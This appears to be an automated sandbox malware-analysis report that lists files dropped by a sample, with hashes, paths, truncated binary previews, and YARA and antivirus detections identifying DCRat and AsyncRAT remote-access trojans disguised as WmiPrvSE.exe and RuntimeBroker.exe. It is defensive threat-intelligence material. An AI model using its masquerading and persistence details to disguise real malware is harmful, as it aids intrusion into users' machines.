                                          Encrypted:false
                                          SSDEEP:1536:ialHDEiCfCDpLTg+XGAjAHZZ0NNm5IdtTCleSVXanaeuMPRuBojRapN4uE2aO59U:BljEirpLTgsyo+y7meyl/iHc4uEq59
                                          MD5:B67B6BA2F08C0ACBF8980DF3683A1DB2
                                          SHA1:C7CCA85F49E89AEE3049E1E2592C8323BF797AA4
                                          SHA-256:A4CCAE82E2AA98E7ED3799759515A4ECFD17781622E34A8CAA42442C924DC7B2
                                          SHA-512:3B8028F2D709689688F2255DBBB3C4DE44451E6130C3AC31923CA8DAD8162DFE8C00B4D093010E3CE4719421A16FAAF57931FB010C9E802AA32A09915A825284
                                          Malicious:false
                                          Preview:MDMP..a..... .........Fg........................`...(.......$...........D&..NJ..........`.......8...........T............-...........................!..............................................................................eJ......0"......GenuineIntel............T.............Fg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER244C.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8410
                                          Entropy (8bit):3.696675188708636
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJap6iQTE6YcDX5SU9HDgmfZ49prO89bwPsfcQm:R6lXJk6/w6YA5SU9HDgmfCHw0fq
                                          MD5:1272107A50D27D7CC3298C94592C29F9
                                          SHA1:B3884FC0E586A2D7BBDBF0CB2060CD636893FA90
                                          SHA-256:ED2359A27780346505EC4ABD6886F1B2BD610CA19ED99708D715B96BB3D37F48
                                          SHA-512:53762E31E460BEB9856B99FDF6650D9D8782E573143588F81B6C9C03273E06CA0A0420E159E0F91B327331FA3CDB717B0B03CD525CC828359905D3533116125C
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER24CA.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4704
                                          Entropy (8bit):4.479592116753323
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zs5Jg77aI9mViWWpW8VYzYm8M4J/S1FQ+q8viS7H7gQLPbVd:uIjfLI7qy7VbJbKRLPbVd
                                          MD5:CB7BBCCF75208BB1907D150754E8A0C7
                                          SHA1:36942B33990AF2B76664320E3DB368220535EEB0
                                          SHA-256:E969492E9F84E747D7997E01F5FD81F5A63A3C8B7EBEFAA548D5AC920208CC71
                                          SHA-512:1B48AE134AB607A08B6DA4CB9B9108E0DF92090EC8A64935E11EAE1F3AA572EF49E53CD3D7F0E302D56C4D1DB2AB45061A9D0033003F6A1A5916426730A8F56C
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="605884" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\ProgramData\e7d19d53a5ec77aafa68c9a929149b118506bb42

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (441), with no line terminators
                                          Category:dropped
                                          Size (bytes):441
                                          Entropy (8bit):5.856029485929199
                                          Encrypted:false
                                          SSDEEP:12:456TzsmrOMx+Fq0t3ZkVNn1dA4imBcwauMBKEat:fTzsRMx+FDt3Zs1OCBcFpBKEm
                                          MD5:885CFBC22BD7E6F39CE8B60B81E33615
                                          SHA1:39D19D70DF7D03BE4BC71605B663E88EE16F153F
                                          SHA-256:D9366373A90C8CFAD02E350A2784B5A5395F36A22D3896EFED388864DDE64F20
                                          SHA-512:111C09339515681AE7D58F82BC399DEE3366F484F9A9DF72DBDBBEBD96EC8A84BBB9A70D7583356E63F37B6657B0EA492DCEEC171D77DA0A6ACE87E67D81B64F
                                          Malicious:false
                                          Preview:e8Wnq3AEl300YHma6cgviVEBsNxyaTSmCyVWHfbU6qv1wh8hAXakhU2I3V4cGLnSkOxkwQTbALy2kNOLOPxD3rEr6Mcwk8OuDcQitXvuE8jVf9hqGsN0XkZ3KGojyh0C7EyH6qc1dD84IsL6pwp2uXWdDXXmtM5gIhYbLZuZPWXUlfub4r4C27RjrVEiSzHRHcvkUtvPBPmYAC1hm6sBS3oKPyu0VLHZPGMIuKGK6pAmV3iodg5WHF8OxkUf9430IMJ40txczhFn3CzWQGWyPvSJH8UJzlLBvKdJtoyutdgkAVVvv8P2iFkX49x2YnnOVD2siqmlSmEwOsJwnjY1WSdpjGPt15WG0SO7dmNEVnk5AyIL0APzOw2CjMJcb3uWQ866dMTAVTfssipv7D30qg1EZLXQcunc2OpB2MsorOd4QJUBhXfX94ptH

                                          C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Recovery\e7d19d53a5ec77aafa68c9a929149b118506bb42

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (945), with no line terminators
                                          Category:dropped
                                          Size (bytes):945
                                          Entropy (8bit):5.9082459955312805
                                          Encrypted:false
                                          SSDEEP:24:/KgW80tTNPHj876p7zuQ/cMfRrMkE4vfmo51zzK:yp3Txfb/ci/1FzK
                                          MD5:A83169300CBDD0B3555FE4FD11D995CB
                                          SHA1:3423D80E77B3D0C0A31E0FE2714C16891A7572D7
                                          SHA-256:2D6B3B84CED8DECA4A60E2845D23AC54C5FED2F7CCB0F9402A57B917B2CEBCC7
                                          SHA-512:4189791E0BA999F782F0AD338C860E7FAD195C92F0D83ECAB46C92E9FC255EF1C91C63DB0A868743265CA53F2AA3B6FC4541D6DF283C27E06C58025E789CA66A
                                          Malicious:false
                                          Preview:CboL2rc8hJoxiqMpCrAXHkxdUjP8tDQfgUKkMbYcKjMkXPuiJSF6YfzcnK0TbdPe2IQOgmdlSiNhXNGFzrza7UHAes6BkFAqTsrO8fChzeozSREaEvduozgiBPuyqbANhgNpf1GToRldqRrMnf7ylQCeMJNtvO1XdaSwEZ5MpJFWND2thhKKeLlQdtdVoXiaaN9P95IOjuJbLpQIReLNEq3SzBSV6jhRlo6AEmtmZ5ktBJFycUEKLVWuUqZ7nxS9M10gtQEoujyIFJQp5e2lfXFPSLqXMw8lmkgJTjEMPaZmhOoKauBJ4qezwkNhjrb8kMfemGWWZqWF7dsEhf6cuzq5GrXsVhmh8bCUsJhUYptOUZ1S2JADv8NufkY5snA1EyGgaXWX8mEFFclq0E0Mgiw9OSyHumluo1JgTU2exmFI4HoD9sFnxyVgBGRIjOmWAUaNSEXfMVY4cnFGnvICg760gneMDu5jAtHjrau4UjbcZaDXALexFjzDYjqpjLccaz4tgfZMAOs7gdbFjHL2PHda4ELHtFUJH8CjgU1fvSw012g4IkFc9kNSVezbUSc53izhb1jPPqG6UniCiR8IA1KhvtOCfaKdz16TC8cQBzNTdQ7s5x2CTU5CYSvrnguzfmHdqO9jysHKo1DfwfGshIKf645uNumfFYx0IeCrxTNkMvYhOQ5IaBRXcmhvTPWEFmEPDMWSdZ4N4jSKgXf6zeFEGaYg6QXi7JfkrIdB3mpAGDd2TWO5tZOkhAJny0VMBWQuErdY4eDMzE7C7fMkBcyh54Dq90MDRc9uxsym20BPWBvcCGpTnvKjhszJnwZDRA5WEMPOqkrLajL3Jlo2K3ZgSaME3o8Gb87VGYXz0bmDD9I7g5ACIg2YkYEoALVBlltcmzxuNyCtQVcTROh8o675FjvrTtzpGkccPpVqIPzUeJHO6

                                          C:\Users\Default\24dbde2999530ef5fd907494bc374d663924116c

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (599), with no line terminators
                                          Category:dropped
                                          Size (bytes):599
                                          Entropy (8bit):5.8663418053295455
                                          Encrypted:false
                                          SSDEEP:12:UEVUMZcmYSXVrNqJyNIk/kmB5fMrs5SHIFm7yBIR9y3ygSzVfp3/LTwKf:fDZSSX5NDpB5fMjHIFPBTafDf
                                          MD5:206FBBB5412B69EEB5A6B5737B6681DB
                                          SHA1:5EA4D3E029221FEE41D9064BC86E59726AAB0757
                                          SHA-256:7F7639C0ABFC6EE11BC48427CCC2264AE44D629E30E880770E2F43CF5214402C
                                          SHA-512:A58D211BA31A3D455396D463204B8CAD4A846AB149D464395D40A0DD55C6D27A6B126F0419B644B921650216C583A5764914F6218FD79E547776B5CFA93C3ACD
                                          Malicious:false
                                          Preview:pDzd2n3uUOJcD6xQ1VtEPPc8j54Apazoq2PMT0I4euDuvMqLEQacTdVZk147s3F3ZewKrk6ANykfMrNWPt5ZAWUNhzlc6KLlpJVQafddUZPe20N3nis87q2CJjn29dECm9zCW65tPcFlH0UqlsyXcNo8QSH11le0UN23AKgrm8telR5TO7QQprjZV1wDzE2o8PR47bqbMHvedJX9Xxm4VOKnnciJYc1iGEgWABVxQzDi6F5LdwqCb7TuEoQf2hCtPMYYmB9WbznfKmrhgWplvzHIvwRVu04twUStrgjcxUklUxkc6t8g1a8aFQn0tnll43szU709xNybOfx8MzZB1X2VW1na3ssKs8qaFuH929tomgLkcoo3OkugBWdcTZFEensPyX3brZI1oNtzqD8PEz5HOKZsQppc3oK8y5vFvMMyb22xnowQb0AoskBo8KLCuq8ADuBuR3d1nHpWRlEm3ZADofQN4HHkBKDv42u3nB8iXIBk5pWWGjIVp4VhdxzKw20cD4bZ0L81bcqfdpSPvuebBsF9gMZzLxveRigAN7g4kQ4NOzExfkZCYZbVzc3nvJpnrLO4JRBxOk1ux1uqImT

                                          C:\Users\Default\WmiPrvSE.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\WmiPrvSE.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Default\WmiPrvSE.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Default\WmiPrvSE.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Default\WmiPrvSE.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Users\Public\Pictures\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (832), with no line terminators
                                          Category:dropped
                                          Size (bytes):832
                                          Entropy (8bit):5.90414159728306
                                          Encrypted:false
                                          SSDEEP:24:puA5/JuFm5CmnvSt/0dZGo858mO8AFSrl16:pNfXzStuZM8NNSL6
                                          MD5:CA9F7BC8FB57A485AF431841F0545A68
                                          SHA1:469EDFC1351B4EC84171F09FD3700A1C959D244F
                                          SHA-256:36DBB8582C0CDF0BDA446D00E59F74BFCE4A339531AA02961F539B4851A9729E
                                          SHA-512:AC0B32D43F7358B3527880A78BAED6E9E68790B91C9E0CC7D01B6DE68969AB96C53AC59EC21718B8B491867FE708921FFC8910B9545003BE19A291618A14835A
                                          Malicious:false
                                          Preview:p3NWdBMPafOn4JUaoaCBoPtWU2xIJmIPXnO9KCIeiJbaB39wXOWtuxKaJ1ClNDGxW8PR5UQlSidfyTUa2Av4QZfkcy0TAhReDnDCns1C8uaMUplzglsMSLh7dpzGe7lvR8bKQRwKJs6f8TPwMAwZyEL1GFj83uhBJp4VNbjPyiDjPB9JaC4eKM6MxkDKryRYL5WTY4jvbgkQAlmFGai00D07srinXYhAQpYUpqvgcIDnlqML88ERQahHEYkqV5YC9j9VMSZapCXsAMVBfWpYTQt0HQPQFEKhuAoBr18qiomOCzH2DjL8Q9ss0JO5CJVk1079hTUoX9zpnfxRJXNg3LQuR5LimDnZTBWL1IUtPgkRKDFUV6wo6yrpkNsmHvBUVaWlIlZADdRWl8kO01NqQ9deUqloasldfQ6tqdLthvlchUEmnevQiVEW72RcAukV1x1VB0hXpdJeYA6Am8B66V5KLkwyMtswKPludtkx6YlELj876RzBtoYg2rJbDtL5uXTIYLg2YN9it08mmz243rCg1E2vkJtNMpUyPziuu7nfp0wCtgyN1QCDUxRTTvRPevVEgJXwRHK6Dg0AS0CEUgW6nQdbiOa9pXB3esfjJC6tFG9y6QBdsN47ZZaPp5OCqLQqe7gjUd4Sjm0hQpeSN7QccEeFRP3Nx4D4zTT9tbJPSmYwi39Aa5yt4yNadbSEjqepj6r7VfiwyBJ0qshXQ3x1FU9BG3gSIEplIsMlMBo5XC42oXuu34yp3mjP6p1c9PntVhs7f5LOP1eDZHXtJvYOQAsfJ6ogKM6HYKgHowP8sjaCIf0zSITN1YdVzMyi

                                          C:\Users\Public\Pictures\RuntimeBroker.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Pictures\RuntimeBroker.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe.log

                                          Download File
                                          Process:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WerFault.exe.log

                                          Download File
                                          Process:C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                          Download File
                                          Process:C:\Windows\regedit\explorer.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1510
                                          Entropy (8bit):5.380493107040482
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                          MD5:EC75759911B88E93A2B5947380336033
                                          SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                          SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                          SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\savesbrokerDriverSavesbroker.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1969
                                          Entropy (8bit):5.37489905566343
                                          Encrypted:false
                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
                                          MD5:40B0737D9E519BE2FAE92D41EE16B42F
                                          SHA1:57A1EE0799583C2FDFE12AB3721B872A7B669D97
                                          SHA-256:3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
                                          SHA-512:EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
                                          Malicious:false
